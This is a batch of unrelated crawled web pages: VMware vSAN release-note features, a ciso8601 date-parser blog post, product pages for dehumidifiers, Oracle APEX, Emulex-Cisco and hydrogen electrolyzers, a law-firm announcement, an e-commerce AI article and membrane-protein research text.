scalability is increased to 400 hosts managed by vLCM within a single vCenter Server. - vSAN management and monitoring enhancements. Additional tools are available to analyze your environment, and rapidly identify root causes of issues and ways to remediate. Enhancements include proactive capacity management, networking diagnostics, insights into performance top contributors, and health check history. - Unplanned failure handling. vSAN 7.0 Update 2 includes enhanced data durability to tolerate unplanned host, disk, or network failures by creating additional durability components at the time of failure. - File Service snapshots. vSAN 7.0 Update 2 simplifies backup of file shares with snapshot support and APIs that allow backup and recovery software vendors to integrate with vSAN File Service. - vSphere Proactive HA support. vSAN now supports proactive HA, which detects hardware issues and can take proactive steps to place hosts into maintenance mode. - VMFS6 file system support. A newly created VM on vSAN datastore will have VMFS6 file system on the VM namespace object if the object format version is 14. You can use SEsparse snapshots with the VM. - Efficient VMDK moves. When you move a VMDK between two directories on same vSAN datastore using the vSphere Datastore Browser UI or API (VirtualDiskManager.moveVirtualDisk), only the VMDK descriptor file and object metadata is updated. This operation is faster because the VMDK backing vSAN object data is not copied. Developer Ready Infrastructure - CNS platform improvements. CNS platform has improved performance, scale, and resiliency, including better concurrency for Async CSI queries, better handling of orphan volumes, and improved troubleshooting tools. - Vanilla Kubernetes support enhancements. Enhancements include vSAN stretched cluster support and topology support. - vSphere with Tanzu. vSAN 7.0 Update 3 supports ReadWriteMany PVs for Tanzu Kubernetes Grid. - vDPp improvements. vSAN Data Persistence Platform now supports asynchronous installation and upgrades of partner services. New versions of MinIO and Cloudian are available in this release. Pre-checks when entering maintenance mode and disk decommissioning support are available. - vSAN cluster shutdown and restart. You now can easily shutdown and restart a vSAN cluster. The Shutdown Cluster wizard performs prechecks, and enables you to review, confirm and track the steps needed before and during shutdown and restart process. - vLCM enhancements. vLCM’s hardware compatibility checks support validation of disk device firmware against the vSAN HCL before applying the desired cluster image. vLCM supports upgrade of vSAN witness host (dedicated) as part of the coordinated cluster remediation workflow for vSAN two-node clusters and stretched clusters. - Enhanced network monitoring and anomaly detection. vSAN 7.0 Update 3 provides additional network health checks for diagnostics, and enables you to tune network monitoring thresholds. - vSAN health check correlation. The new vSAN health correlation engine helps identify the root cause of issues on the cluster. This information can simplify troubleshooting and help you remediate related warnings on the cluster. - VM I/O trip analyzer. Visual representation of the vSAN I/O path and related performance information throughout the I/O path enables you to easily diagnose VM performance issues. - Improved performance monitoring of PV/FCDs. Performance displays can provide an end-to-end view of Persistent Volumes and First Class Disk performance. - Stretched cluster site/witness failure resiliency. This release enables stretched clusters to tolerate planned or unplanned downtime of a site and the witness. You can perform site-wide maintenance (such as power or networking) without concerns about witness availability. - Nested fault domains for two-node deployments. This feature provides the ability to make an additional copy of the data within the host in addition to making copies across the hosts in a two-node cluster. This delivers data-availability even after a planned/unplanned downtime of a host and losing a drive or disk group on the surviving host. The policy can be configured though SPBM. - Stuck I/O enhancements. vSAN gracefully detects stuck I/O (failure of I/O controller to complete an operation) on a host and redirects it to a replica. The vSphere Client alerts you of the condition, so you can migrate workloads non-disruptively and power-cycle the problematic host. - Encryption key persistence. Encryption keys generated by the Key Management solution can be stored in the TPM chip. - Access Based Enumeration. vSAN File Services now supports SMB Access Based Enumeration (ABE). ABE restricts directory enumeration based on access privileges configured on the directory. Performance without Tradeoffs - vSAN Express Storage Architecture. vSAN ESA is an alternative architecure that provides the potential for huge boosts in performance with more predictable I/O latencies and optimized space efficiency. - Increased write buffer. vSAN Original Storage Architecture can support more intensive workloads. You can configure vSAN hosts to increase the write buffer from 600 GB to 1.6 TB. - Native snapshots with minimal performance impact. vSAN ESA file system has snapshots built in. These native snapshots cause minimal impact to VM performance, even if the snapshot chain gets deep. The snapshots are fully compatible with existing backup applications using VMware VADP. Supreme Resource and Space Efficiency - Erasure Coding without compromising performance. The vSAN ESA RAID5/RAID6 capabilities with Erasure Coding provide a highly efficient Erasure Coding code path, so you can have both a high-performance and a space-efficient storage policy. - Improved compression. vSAN ESA has advanced compression capabilities that can bring up to 4x better compression. Compression is performed before data is sent across the vSAN network, providing better bandwidth usage. - Expanded usable storage potential. vSAN ESA consists of a single-tier architecture with all devices contributing to capacity. This flat storage pool removes the need for disk groups with caching devices. - Reduced performance overhead for high VM consolidation. Resource and space efficiency improvements enable you to store more VM data per cluster, potentially increasing VM consolidation ratios. - HCI Mesh support for 10 client clusters. A storage server cluster can be shared with up to 10 client clusters. Fast, Efficient Data Protection with vSAN ESA Native Snapshots - Negligible performance impact. Long snapshot chains and deep snapshot chains cause minimal performance impact. - Faster snapshot operations. Applications that suffered from snapshot create or snapshot delete stun times will perform better with vSAN ESA. - Consistent partner backup application experience using VMware VADP. VMware snapshot APIs are unchanged. VMware VADP supports all vSAN ESA native snapshot operations on the vSphere platform. Availability and Serviceability - Simplified and accelerated servicing per device. vSAN ESA removes the complexity of disk groups, which streamlines the replacement process for failed drives. - Smaller failure domains and reduced data resynchronization. vSAN ESA has no single points of failure in its storage pool design. vSAN data and metadata are protected according to the Failures To Tolerate (FTT) SPBM setting. Neither caching nor compression lead to more than a single disk failure domain if a disk crashes. Resync operations complete faster with vSAN ESA. - Enhanced data availability and improved SLAs. Reduction in disk failure domains and quicker repair times means you can improve the SLAs provided to your customers or business units. - vSAN boot-time optimizations. vSAN boot logic has been further optimized for faster startup. - Enhanced shutdown and startup workflows. The vSAN cluster shutdown and cluster startup process has been enhanced to support vSAN clusters that house vCenter or infrastructure services such as AD, DNS, DHCP, and so on. - Reduced vSAN File Service failover time. vSAN File Service planned failovers have been streamlined. Intuitive, Agile Operations - Consistent interfaces across all vSAN platforms. vSAN ESA uses the same screens and workflows as vSAN OSA, so the learning curve is small. - Per-VM policies increase flexibility. vSAN ESA is moving cluster-wide settings to the SPBM level. In this release, SPBM compression settings give you granular control down to the VM or even VMDK level, and you can apply them broadly with datastore default policies. - Proactive Insight into compatibility and compliance. This mechanism helps vSAN clusters connected to VMware Analytics Cloud identify software and hardware anomalies. If an OEM partner publishes an advisory about issues for a drive or I/O controller listed in vSAN HCL, you can be notified about the potentially impacted environment. Additional Features and Enhancements - Enhanced network uplink latency metrics. vSAN defines more meaningful and relevant metrics catered to the environment, whether the latencies are temporary or from an excessive workload. - RDT level checksums. You can set checksums at the RDT layer. These new checksums can aid in debugging and triaging. - vSAN File Service debugging. File Service Day 0 operations have been improved for efficient validation and troubleshooting. - vSAN File Service over IPv6. You can create a file service domain with IPv6 network. - vSAN File Service network reconfiguration. You can change file server IPs including the primary IP to new IPs in the same or different subnet. - vSphere Client Remote Plug-ins. All VMware-owned local plug-ins are transitioning to the new remote plug-in architecture. vSAN local plug-ins have been moved to vSphere Client remote plug-ins. The local vSAN plug-ins are deprecated in this release. - vLCM HCL disk device. Enhancements improve vLCM’s functionality and efficiency for checking compatibility with the desired image. It includes a check for “partNumber” and “vendor” to add coverage for more vendors. - Reduced start time of vSAN health service. The time needed to stop vSAN health service as a part of vCenter restart or upgrade has been reduced to 5 seconds. - vSAN health check provides perspective to VCF LCM. This release provides only relevant vSAN health checks to VCF in order to improve LCM resiliency in VCF. - vSAN improves cluster NDU for VMC. New capabilities improve design and operation of a highly secure, reliable, and operationally efficient service. - vSAN encryption key verification. Detects invalid or corrupt keys sent from the KMS server, identifies discrepancies between in-memory and on-disk DEKs, and alerts customers in case of discrepancies. - Better handling of large component deletes. Reclaims the logical space and accounts for the physical space faster, without causing NO_SPACE error. - Renamed vSAN health “Check” to “Finding.” This change makes the term consistent with all VMware products. - Place vSAN in separate sandbox domain. Daemon sandboxing prevents lateral movement and provides defense in depth. Starting with vSAN 8.0, least privilege security model is implemented, wherein any daemon that does not have its custom sandbox domain defined, will run as a deprivileged domain. This achieves least-privilege model on an ESXi host, with all vSAN running in their own sandbox domain with the least possible privilege. - vSAN Proactive Insights. This mechanism enables vSAN clusters connected to VMware Analytics Cloud to identify software and hardware anomalies proactively. - Management and monitoring of PMEM for SAP HANA. You can manage PMEM devices within the hosts. vSAN provides management capabilities such as health checks, performance monitoring, and space reporting for the PMEM devices. PMEM management capabilities do not require vSAN services to be enabled. vSAN does not use PMEM devices for caching vSAN metadata or for vSAN data services such as encryption, checksum, or dedupe and compression. The PMEM datastore is local to each host, but can be managed from the monitor tab at the cluster level. - Replace MD5, SHA1, and SHA2 in vSAN. SHA1 is no longer considered secure, so VMware is replacing SHA1, MD5, and SHA2 with SHA256 across all VMware products, including vSAN. - IL6 compliance. vSAN 8.0 is IL6 compliant. - Disaggregation with vSAN Express Storage Architecture. vSAN 8.0 Update 1 provides disaggregation support for vSAN Express Storage Architecture (ESA), as it is supported with vSAN Original Storage Architecture (OSA). You can mount remote vSAN datastores that reside in other vSAN ESA server clusters. You also can use an ESA cluster as the external storage resource for a compute-only cluster. All capabilities and limits that apply to disaggregation support for vSAN OSA also apply to vSAN ESA. vSAN ESA client clusters can connect only to a vSAN ESA based server cluster. - Disaggregation for vSAN stretched clusters (vSAN OSA). This release supports vSAN stretched clusters in disaggregated topology. In addition to supporting several stretched cluster configurations, vSAN can optimize network paths for certain topologies to improve stretched cluster performance. - Disaggregation across clusters using multiple vCenter Servers (vSAN OSA). vSAN 8.0 Update 1 introduces support for vSAN OSA disaggregation across environments using multiple vCenter Servers. This enables clusters managed by one vCenter Server to use storage resources that reside on a vSAN cluster managed by a different vCenter Server. Optimized Performance, Durability, and Flexibility - Improved performance with new Adaptive Write Path. vSAN ESA introduces a new adaptive write path that dynamically optimizes guest workloads tht issue large streaming writes, resulting in higher throughput and lower latency with no additional complexity. - Optimized I/O processing for single VMDK/objects (vSAN ESA). vSAN ESA has optimized the I/O processing that occurs for each object that reside on a vSAN datastore, increasing the performance of VMs with a significant amount of virtual hardware storage resources. - Enhanced durability in maintenance mode scenarios. When a vSAN ESA cluster enters maintenance mode (EMM) with Ensure Accessibility (applies to RAID 5/6 Erasure Coding), vSAN can write all incremental updates to another host in addition to the hosts holding the data. This helps ensure the durability of the changed data if additional hosts fail while the original host is still in maintenance mode. - Increased administrative storage capacity on vSAN datastores using customizable namespace objects. You can customize the size of namespace objects that enable administrators to store ISO files, VMware content library, or other infrastructure support files on a vSAN datastore. - Witness appliance certification. In vSAN 8.0 Update 1, the software acceptance level for vSAN witness appliance has changed to Partner Supported. All vSphere Installation Bundles (VIBs) must be certified. - Auto-policy management for the default storage policy (vSAN ESA). vSAN ESA introduces auto-policy management, an optional feature that creates and assigns a default storage policy designed for the cluster. Based on the size and type of cluster, auto-policy management selects the ideal level of failure to tolerate and data placement scheme. Skyline health uses this data to monitor and alert you if the default storage policy is ideal or sub-optimal, and guides you to adjust the default policy based on the cluster characteristics. Skyline health actively monitors the cluster as its size changes, and provides new recommendations as needed. - Skyline health intelligent cluster health scoring, diagnostics and remediation. Improve efficiency by using the cluster health status and troubleshooting dashboard that prioritizes identified issues, enabling you to focus and take action on the most important issues. - High resolution performance monitoring in vSAN performance service. vSAN performance service provides real-time monitoring of performance metrics that collects and renders metrics every 30 seconds, making monitoring and troubleshooting more meaningful. VMware snapshot APIs are unchanged. VMware VADP supports all vSAN ESA native snapshot operations on the vSphere platform. - VM I/O trip analyzer task scheduling. VM I/O trip analyzer can schedule based on time-of-day, for a particular duration and frequency to capture details for repeat-offender VMs. The diagnostics data collected are available for analysis in the VM I/O trip analyzer interface in vCenter. - PowerCLI enhancements. PowerCLI supports the following new capabilities: vSAN ESA disaggregation vSAN OSA disaggregation for stretched clusters vSAN OSA disaggregation across multiple vCenter Servers vSAN cluster shutdown Object format updates and custom namespace objects Cloud Native Storage - Cloud Native Support for TKGs and supervisor clusters (vSAN ESA). Containers powered by vSphere and vSAN can consume persistent storage for developers and administrators, and use the improved performance and efficiency for their cloud native workloads. - Data Persistence platform support using common vSphere switching. vSAN Data Persistence platform allows third-party ISVs to build solutions, such as S3-compatible object stores, that run natively on vSAN. vDPp is now compatible with VMware vSphere Distributed Switches, reducing the cost and complexity of these solutions. - Thick provisioning for persistent volumes using SPBM on VMFS datastores (VMware vSAN Direct Configuration). Persistent volumes can be programmatically provisioned as thick when defined in the storage class that is mapped to a storage policy. Enhanced topologies for disaggregation with vSAN Express Storage Architecture bring feature parity for vSAN OSA and vSAN ESA. - vSAN ESA support for stretched clusters in disaggregated topology. vSAN ESA supports disaggregation when using vSAN stretched clusters. In addition to supporting several stretched cluster configurations, vSAN also optimizes the network paths for certain topologies to improve the performance capabilities of stretched cluster configurations. - Support of disaggregation across clusters using multiple vCenter Servers. vSAN 8.0 Update 2 supports disaggregation across environments using multiple vCenter Servers when using vSAN ESA. This enables vSphere or vSAN clusters managed by one vCenter Server to use the storage resources of a vSAN cluster managed by a different vCenter Server. - vSAN ESA Adaptive Write path for disaggregated storage. Disaggregated deployments get the performance benefits of a new adaptive write path previously introduced in vSAN 8.0 Update 1 for standard ESA based deployments. VMs running on a vSphere or vSAN cluster that consume storage from another vSAN ESA cluster can take advantage of this capability. Adaptive write path technology in a disaggregated environment helps your VMs achieve higher throughput and lower latency, and do so automatically in real time, without any interaction by the administrator. Core Platform Enhancements - Integrated File Services for Cloud Native and traditional workloads. vSAN 8.0 Update 2 supports vSAN File Service on vSAN Express Storage Architecture. File service clients can benefit from performance and efficiency enhancements provided by vSAN ESA. - Adaptive Write Path optimizations in vSAN ESA. vSAN ESA introduces an adaptive write path that helps the cluster ingest and process data more quickly. This optimization improves performance for workloads driving high I/O to single object (VMDK), and also improves aggregate cluster performance. - Increased number of VM’s per host in vSAN ESA clusters (up to 500/host). vSAN 8.0 Update 2 supports up to 500 VMs per host VM on vSAN ESA clusters, provided the underlying hardware infrastructure can support it. Now you can leverage NVMe-based high performance hardware platforms optimized for the latest generation of CPUs with high core densities, and consolidate more VMs per host. - New ReadyNode profile and support for read-intensive devices for vSAN ESA. vSAN ESA announces the availability of new ReadyNode profiles designed for small data centers and edge environments with lower overall hardware requirements on a per-node basis. This release also introduces support for read-intensive storage devices. - vSAN ESA support for encryption deep rekey. vSAN clusters using data-at-rest encryption have the ability to perform a deep rekey operation. A deep rekey decrypts the data that has been encrypted and stored on a vSAN cluster using the old encryption key, and re-encrypts the data using newly issued encryption keys prior to storing it on the vSAN cluster. - vSAN ESA prescriptive disk claim. vSAN ESA includes a prescriptive disk claim process that further simplifies management of storage devices in each host in a vSAN cluster. This feature provides consistency to the disk claiming process during initial deployment and cluster expansion. - Capacity reporting enhancements. Overhead breakdown in vSAN ESA space reporting displays both the ESA object overhead and the original file system overhead. - Auto-Policy management improvements in vSAN ESA. Enhanced auto-policy management feature determines if the default storage policy needs to be adjusted when a user adds or removes a host from a cluster. If vSAN identifies a need to change the default storage policy, it triggers a health check warning. You can make the change with a simple click at which time vSAN reconfigures the cluster with the new policy. - Skyline Health remediation enhancements. vSAN Skyline Health helps you reduce resolution times by providing deployment-specific guidance along with more prescriptive guidance on how to resolve issues. - Key expiration for clusters with data-at-rest encryption. vSAN 8.0 Update 2 supports the use of KMS servers with a key expiration attribute used for assigning an expiration date to a Key Encryption Key (KEK). - I/O top contributors enhancements. vSAN Performance Service has improved the process to find performance hot spots over a customizable time period to help you diagnose performance issues while using multiple types of sources for analysis (VMs, host disks, and so on). - I/O Trip Analyzer supported on two node clusters and stretched clusters. vSAN 8.0 Update 2 has enhanced the I/O Trip Analyzer to report on workloads in a vSAN stretched cluster. Now you can determine where the primary source of latency is occurring in a vSAN stretched cluster, as well as latencies in other parts of the stack that can contribute to the overall latency experienced by the VM. - Easier configuration for two node clusters and stretched clusters. Several new features to help management of two node and stretched cluster deployments. Witness host traffic configured in the vSphere Client. Support for medium sized witness host appliance in vSAN ESA. Support in vLCM to manage lifecycle of shared witness host appliance types. Cloud Native Storage - CSI snapshot support for TKG service. Cloud Native Storage introduces CSI snapshot support for TKG Service, enabling K8s users and backup vendors to take persistent volume snapshots on TKGS. - Data mobility of Cloud Native persistent volumes across datastores. This release introduces built-in migration of persistent volumes across datastores in the vSphere Client.
systems_science
https://engineering.close.com/posts/ciso8601
2020-01-28T16:14:56
s3://commoncrawl/crawl-data/CC-MAIN-2020-05/segments/1579251779833.86/warc/CC-MAIN-20200128153713-20200128183713-00540.warc.gz
0.902049
596
CC-MAIN-2020-05
webtext-fineweb__CC-MAIN-2020-05__0__22304517
en
Introducing ciso8601: A fast ISO8601 date time parser for Python Project link: https://github.com/closeio/ciso8601 Sometimes it’s the little things that make web apps faster. We noticed that loading leads and opportunity view pages in Close wasn’t as fast as we wanted it to be in some cases, so we pulled up the profiler. To our surprise, a large portion of time was spent parsing date times, sometimes up to a second. How did this happen? We serialize certain lead fields in elasticsearch so they get returned with our search results. After fetching the fields, we create corresponding instances in our ORM (see how we made our ORM faster). Part of this process is converting the ISO8601 date time string into a Python datetime object, which was done using dateutil’s parse method: %timeit dateutil.parser.parse(u'2014-01-09T21:48:00.921000') 10000 loops, best of 3: 111 us per loop On a fast computer it takes over 0.1ms to parse a date time string. For large object structures with thousands of date time objects this can easily add up. For example, each of our leads has two time stamps (date created and updated), and so do our contacts (each lead can have multiple contacts). When serializing many leads this can easily add up to a second. There are a few ways to solve this problem: - Refactor our code base so date times are always unserialized lazily (whenever needed) - Use a faster date time parser We decided to look for an existing faster date time parser first. After looking for faster parsers, we found aniso8601, which was faster but not as fast as we wanted it to be. Other parsers we found were slower, and even Python’s datetime module wasn’t as fast as date parsing should be. We figured that date time parsing should be fast and that writing a faster date time parser would benefit other projects as well, so we did it! We wrote a C module that parses an ISO8601 date time string and returns a Python date time object. The above date time is now parsed much faster: %timeit ciso8601.parse_datetime(u'2014-01-09T21:48:00.921000') 1000000 loops, best of 3: 320 ns per loop Note this is in nano seconds, so that’s just 0.00032ms. Now, even if we parse tens of thousands of date time objects, it won’t take longer than few ms. Our profiler confirmed this: Check out the project on GitHub: https://github.com/closeio/ciso8601
systems_science
https://www.corroventa.com.au/products/adsorption-dehumidifiers/
2024-04-20T22:27:33
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817688.24/warc/CC-MAIN-20240420214757-20240421004757-00508.warc.gz
0.919171
218
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__18618741
en
In unheated environments or when water has penetrated deep into a structure, drying using an adsorption dehumidifier is the ideal solution. Corroventa’s adsorption dehumidifiers are available in both analogue and digital models, but all models share certain features; they are powerful and robust, compact and user-friendly, and they have a long service life. Quite simply, they are built for professionals. The picture to the right shows the functioning principle for an adsorption dehumidifier. The process air is sucked in through the inlet with the help of a process air fan (1), the air passes through the rotor (4) whereupon the dehumidified air exists through a dry air outlet (2). The moisture that is absorbed in the rotor is driven out through a small part of the process air being heated up in a heater (5) whereupon it passes through a smaller part of the rotor which is regenerated in this way. The damp air is then removed via the outlet to the environment (3).
systems_science
https://www.slepatents.com/mr-kevin-miller-an-associate/
2024-04-13T21:49:19
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296816853.44/warc/CC-MAIN-20240413211215-20240414001215-00315.warc.gz
0.958312
216
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__152253144
en
Mr. Kevin Miller: An Associate Saliwanchik, Lloyd & Eisenschenk (SLE) is pleased to announce that Mr. Kevin Miller is now an Associate at the firm. Mr. Miller, who joined SLE as a Technical Specialist in 2013, is now a member of the Florida Bar and a Registered Patent Attorney with the United States Patent and Trademark Office. Mr. Miller earned his B.A in Philosophy and Computer Science from Hampden-Sydney College. After working as a software engineer, Mr. Miller attended the Levin College of Law at the University of Florida, where he earned his J.D. He also has an M.B.A. in Technology Management from the University of Phoenix. His primary areas of focus are U.S. and International Patent Preparation and Prosecution, primarily in software and systems engineering, large database systems, machine learning, software and hardware interfaces, and information interfaces and presentation. He is a Microsoft Certified Solutions Developer and a member of the Association for Computing Machinery.
systems_science
https://digiwebocean.com/how-ai-is-transforming-the-e-commerce-industry-in-2024/
2024-04-22T02:54:42
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296818072.58/warc/CC-MAIN-20240422020223-20240422050223-00333.warc.gz
0.901332
956
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__171826782
en
The world of e-commerce is undergoing a significant transformation, driven by the ever-evolving field of Artificial Intelligence (AI). AI is no longer science fiction; it’s rapidly becoming a cornerstone of successful online businesses, shaping how we shop and interact with brands online. Moreover, artificial intelligence (AI) has revolutionized countless industries, and the e-commerce industry is no exception. With its ability to analyze vast amounts of data, automate processes, and personalize customer experiences, AI is reshaping the way businesses operate in the digital marketplace. Let’s explore the profound impact of AI on the e-commerce industry, and how it is driving innovation, efficiency, and growth in online retail. One of the most impactful applications of AI in e-commerce is personalization. AI algorithms analyze vast amounts of customer data, including browsing behavior, purchase history, and even demographics, to understand individual preferences. This allows businesses to: - Recommend products: AI can suggest items likely to interest customers based on their past interactions, leading to increased sales and customer satisfaction. - Personalize search results: Tailored search results ensure customers find what they’re looking for faster, improving the overall shopping experience. - Offer targeted promotions: AI can identify customers most likely to respond to specific promotions, maximizing marketing campaign effectiveness. This level of personalization not only improves customer satisfaction but also increases conversion rates and average order value. Efficient Customer Service: The impact of AI in e-commerce extends far beyond creating a personalized experience. Here are some other key areas where AI is making waves: - Chatbots and virtual assistants: AI-powered chatbots provide 24/7 customer support, answer frequently asked questions, and even handle simple transactions, freeing up human agents for more complex tasks. - Dynamic pricing: AI can analyze market trends, competitor pricing, and customer behavior to adjust prices in real time, ensuring competitiveness and optimal profitability. - Fraud prevention: AI algorithms can identify suspicious behavior and flag potentially fraudulent transactions, protecting businesses from financial losses. - Inventory management: AI can predict demand fluctuations and optimize inventory levels, minimizing the risk of overstocking or understocking, and ensuring efficient logistics. Fraud Detection and Security: AI-powered fraud detection systems analyze transaction data in real time to identify suspicious behavior and prevent fraudulent activities. By employing machine learning algorithms, e-commerce businesses can detect patterns indicative of fraud, such as unusual purchasing patterns or suspicious IP addresses, and take immediate action to mitigate risks. Additionally, AI enhances cybersecurity by identifying vulnerabilities, detecting malware, and safeguarding sensitive customer information, thereby ensuring a secure shopping environment for online shoppers. Predictive Analytics and Forecasting: AI algorithms analyze vast amounts of data to identify patterns, e-commerce trends, and insights that help e-commerce businesses make informed decisions. Predictive analytics forecast future demand, anticipate customer behavior and identify growth opportunities. By leveraging AI-driven insights, businesses can optimize marketing campaigns, launch targeted promotions, and allocate resources more effectively, driving revenue and profitability. Challenges and Considerations: While AI holds immense potential for e-commerce businesses, it’s crucial to acknowledge the challenges that come with its implementation. These include: - Data security and privacy: Utilizing customer data responsibly and ethically is paramount. Businesses must adhere to data privacy regulations and ensure transparency in data collection and usage. - Cost of implementation: Developing and maintaining robust AI systems can be expensive, especially for smaller businesses. - Explainability and bias: AI algorithms can be complex, making it challenging to understand their decision-making processes. It’s crucial to address potential biases and ensure fair and ethical treatment of all customers. The Future of E-commerce: As AI technology continues to evolve and become more accessible, its impact on e-commerce will undoubtedly intensify. Businesses that embrace AI and utilize its capabilities effectively will be well-positioned to thrive in the ever-competitive online landscape. However, it’s crucial to approach AI implementation thoughtfully, prioritizing ethical considerations, data security, and responsible use of this powerful technology. The integration of artificial intelligence into the e-commerce industry has revolutionized the way businesses operate and interact with customers in the digital marketplace. From personalized shopping experiences and dynamic pricing to efficient customer service and predictive analytics, AI-driven innovations are driving growth, efficiency, and competitiveness in online retail. As AI continues to evolve and advance, e-commerce businesses must embrace these transformative technologies to stay ahead of the curve and meet the ever-changing demands of today’s consumers.
systems_science
http://primary-path.com/
2019-03-26T00:02:55
s3://commoncrawl/crawl-data/CC-MAIN-2019-13/segments/1552912204736.6/warc/CC-MAIN-20190325234449-20190326020449-00107.warc.gz
0.914275
153
CC-MAIN-2019-13
webtext-fineweb__CC-MAIN-2019-13__0__99373889
en
Oracle Application Express (APEX) is an Oracle product that is fully supported, enterprise ready and comes at no additional cost. If you have the Oracle Database, you already have Application Express! Since 2004, Application Express has been a fully supported and no-cost feature of the Oracle Database. Using Application Express as a platform, thousands of customers have created applications that range from small opportunistic solutions to enterprise-wide mission-critical systems. Perhaps not surprising, Oracle themselves are users of the development platform hosting their online store. - Fully supported by Oracle - No cost feature of the Oracle Database - Included with Oracle Database since 2004 - Runs wherever the Oracle Database runs - Can exploit all features of Oracle Database - Scales with the Oracle Database
systems_science
http://www.emulex.com/fr/partners/strategic-alliances/cisco.html
2013-05-25T13:09:14
s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368705953421/warc/CC-MAIN-20130516120553-00031-ip-10-60-113-184.ec2.internal.warc.gz
0.884942
258
CC-MAIN-2013-20
webtext-fineweb__CC-MAIN-2013-20__0__173364642
en
Cisco Systems, Inc. is the worldwide leader in networking for the Internet. Today, networks are an essential part of business, education, government and home communications, and Cisco Internet Protocol-based (IP) networking solutions are the foundation of these networks. Cisco hardware, software, and service offerings are used to create Internet solutions that allow individuals, companies, and countries to increase productivity, improve customer satisfaction and strengthen competitive advantage. The Cisco name has become synonymous with the Internet, as well as with the productivity improvements that Internet business solutions provide. At Cisco, our vision is to change the way people work, live, play and learn. Hear Ed Bugnion of Cisco (VP/CTO, SAVBU) Talk About Convergence with Emulex - Emulex Announces 10Gb/s FCoE CNAs - Emulex Teams with Cisco and VMware to Deliver Enhanced Storage Solution - Emulex Extends Virtual HBA Technology to Next Generation Fibre Channel over Ethernet and 8Gb/s SAN Connectivity Solutions - Emulex Teams with Nuova Systems to Showcase the First Fibre Channel over Ethernet Demonstration in Europe - Emulex Announces Collaboration with Nuova Systems to Develop Fibre Channel over Ethernet Products
systems_science
https://medailab.es/
2024-04-18T14:49:14
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296817206.54/warc/CC-MAIN-20240418124808-20240418154808-00012.warc.gz
0.881806
110
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__68177712
en
The MedAI Lab, founded by Dr. Manuel Campos and Dr. Jose M. Juarez in 2022, design and implements Medical Informatics and Artificial Intelligence technology aimed at supporting decision-based medical tasks through knowledge and data-intensive computer-based solutions. Our research creates new avenues to help healthcare professionals in daily activity and critical decisions, fusing Medical Informatics and Artificial Intelligence technologies (aka Medical AI). Medical Informatics + Artificial Intelligence = Medical AI Our final goal is to improve healthcare and professional performance using technology
systems_science
https://astronaerospace.com/hydrogen-technology/
2024-04-14T13:46:33
s3://commoncrawl/crawl-data/CC-MAIN-2024-18/segments/1712296816879.72/warc/CC-MAIN-20240414130604-20240414160604-00488.warc.gz
0.851939
684
CC-MAIN-2024-18
webtext-fineweb__CC-MAIN-2024-18__0__169754053
en
We are now taking PRE-ORDERS. no DOWN PAYMENT All Astron Aerospace’s technology’s are either PATENTED or PATENT pending. Much more proficient way to break the bond of hydrogen as the earth provides the heat and the ocean provides the pressure reducing the amount of energy necessary to break the bond of hydrogen and oxygen in the water. The hydrogen comes up compressed naturally as it is deriven from deep in the ocean. Anywhere from 30-120 bar. PATENT PENDING - All Technical Information may not be displayed at this time. Write to us to know more! Like fuel cells, electrolyzers consist of an anode and a cathode separated by an electrolyte. Different electrolyzers function in different ways, mainly due to the different type of electrolyte material involved and the ionic species it conducts. Polymer Electrolyte Membrane Electrolyzers In a polymer electrolyte membrane (PEM) electrolyzer, the electrolyte is a solid specialty plastic material. Water reacts at the anode to form oxygen and positively charged hydrogen ions (protons). The electrons flow through an external circuit and the hydrogen ions selectively move across the PEM to the cathode. At the cathode, hydrogen ions combine with electrons from the external circuit to form hydrogen gas. Anode Reaction: 2H2O → O2 + 4H+ + 4e- Cathode Reaction: 4H+ + 4e- → 2H2 Alkaline electrolyzers operate via transport of hydroxide ions (OH-) through the electrolyte from the cathode to the anode with hydrogen being generated on the cathode side. Electrolyzers using a liquid alkaline solution of sodium or potassium hydroxide as the electrolyte have been commercially available for many years. Newer approaches using solid alkaline exchange membranes (AEM) as the electrolyte are showing promise on the lab scale. Solid Oxide Electrolyzers Solid oxide electrolyzers, which use a solid ceramic material as the electrolyte that selectively conducts negatively charged oxygen ions (O2-) at elevated temperatures, generate hydrogen in a slightly different way. Steam at the cathode combines with electrons from the external circuit to form hydrogen gas and negatively charged oxygen ions. The oxygen ions pass through the solid ceramic membrane and react at the anode to form oxygen gas and generate electrons for the external circuit. Solid oxide electrolyzers must operate at temperatures high enough for the solid oxide membranes to function properly (about 700°–800°C, compared to PEM electrolyzers, which operate at 70°–90°C, and commercial alkaline electrolyzers, which typically operate at less than 100°C). Advanced lab-scale solid oxide electrolyzers based on proton-conducting ceramic electrolytes are showing promise for lowering the operating temperature to 500°–600°C. The solid oxide electrolyzers can effectively use heat available at these elevated temperatures (from various sources, including nuclear energy) to decrease the amount of electrical energy needed to produce hydrogen from water.
systems_science
http://www.irtg1830.com/research/
2017-03-30T02:38:16
s3://commoncrawl/crawl-data/CC-MAIN-2017-13/segments/1490218191984.96/warc/CC-MAIN-20170322212951-00438-ip-10-233-31-227.ec2.internal.warc.gz
0.914916
376
CC-MAIN-2017-13
webtext-fineweb__CC-MAIN-2017-13__0__25972662
en
Membrane proteins are of extraordinary importance for cell and organ function. In general, about one third of the genes in most currently sequenced species code for these proteins. However, it is not only the percentage of genes coding for membrane proteins which appears remarkable, the wide variety of functions fulfilled by membrane proteins are even more impressive: - they generate action potentials and define the membrane potential; - they are involved in nutrient import and in export of metabolic end-products across the plasma membrane; - they transduce and induce signalling processes; - they constitute the respiratory and photosynthetic electron transport chains; - they influence cell shape, cell adhesion and cell motility; - they are involved in anabolic and catabolic reactions with intermediates; and - they are critical for ion and water homeostasis. This list is, of course, not complete but it highlights why this group of proteins is present in virtually every membrane from pro- and eukaryotes. Accordingly, great progress has been made in the past in the molecular identification and functional characterisation of a wide number of these proteins. The extraordinary importance of membrane proteins is exemplified by the growing research efforts on them and by the many Nobel prizes awarded to membrane researchers in recent years, e.g. Paul Boyer, John Walker and Jens Skou (1997), Günter Blobel (1999), Peter Agre and Roderick MacKinnon (2003), or Richard Axel and Linda Buck (2004). Therefore, it is not surprising that more than 